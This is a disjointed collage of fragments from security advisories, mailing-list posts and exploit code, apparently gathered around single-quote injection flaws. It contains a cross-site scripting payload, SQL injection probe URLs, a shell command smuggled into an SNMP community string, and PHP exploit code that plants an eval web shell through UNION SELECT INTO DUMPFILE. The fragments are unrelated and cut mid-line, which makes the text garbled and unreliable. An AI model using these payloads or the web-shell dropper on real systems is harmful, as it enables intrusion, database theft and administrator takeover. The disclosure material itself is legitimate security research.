errMsg.asp?msg="><script>alert('Aria-Security')</script>
[Other Advanced SQL Injection]
* AboutUs.asp?id=-1'
Unclosed quotation mark? use it.
*SubCategory.asp?ID=-1'
Unclosed quotation mark? use it.
HINT: suppose the first column name is a.BrochureName
107. err(oc_('Submission ID or password entered is incorrect'));
108. }
109. $_POST = array_merge($_POST, mysql_fetch_assoc($anr));
User input passed through $_POST['pid'] seems correctly sanitised by the safeSQLstr() function, but in the query
at line 105 single quotes aren't used before concatenating the user input into the query string. This can be
exploited to conduct a Blind SQL Injection attack. Successful exploitation of this vulnerability requires at
least one record in the 'paper' table, and 'Edit Submission' to be enabled.
[-] Disclosure timeline:
WHERE `aid`='$a_aid' AND `pwd`='$a_pas'"));
------------>[/source code]<-----------
As many times before in phpnuke insecurities history the attack comes through
base64 encoding/decoding. After base64_decode() there can be single quotes in
"$abadmin", but no sanitization is applied to the variable! And it is easy to see SQL
injection possibilities here. This can lead to stealing arbitrary information
from the underlying database, including the admin username and password MD5 hash.
The next step can be cracking the hash to reveal the plaintext password or using the MD5 hash
directly for cookie manipulation, both leading to gaining phpnuke admin privileges.
Multiple cross-site scripting vulnerabilities in the Manager and Host
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the " character sequence in a cookie
value, which could cause sensitive information such as session IDs
> http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx
Although it's amusing Firefox filters '"' in this prompt to begin with,
rather than designing it more wisely not to render attacker-controlled
text inline (use a table view below instead!), I'm not sure that the
ability to use single quotes (or other homoglyphs) makes the attack
considerably more dangerous.
Note that any person familiar with the dialog is unlikely to be confused
by this prompt, as a clear indication of the originating site, consistent
with the design of this dialog, is preserved ("...at
The core of the problem is using Perl EP3 with templates containing substitutions similar to
$val='NEW_VALUE';
without first escaping single quotes in NEW_VALUE;
As an example, the SNMP community string configuration accepts the following value as an allowed source of SNMP requests:
"none'.`touch /etc/foo`.'"
}
function export_sh() {
global $url, $prefix, $my_path, $ck;
//change php code if you want
$_enc = my_encode("<?php eval(\$_GET[c]);?>"); //just for the purpose of hiding from the eye, you have to use single quotes for INTO DUMPFILE
$_sql = "-99999 UNION SELECT null,$_enc,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null INTO DUMPFILE '".$my_path."/sh.php' FROM ".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$_o = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err_ii($o)) {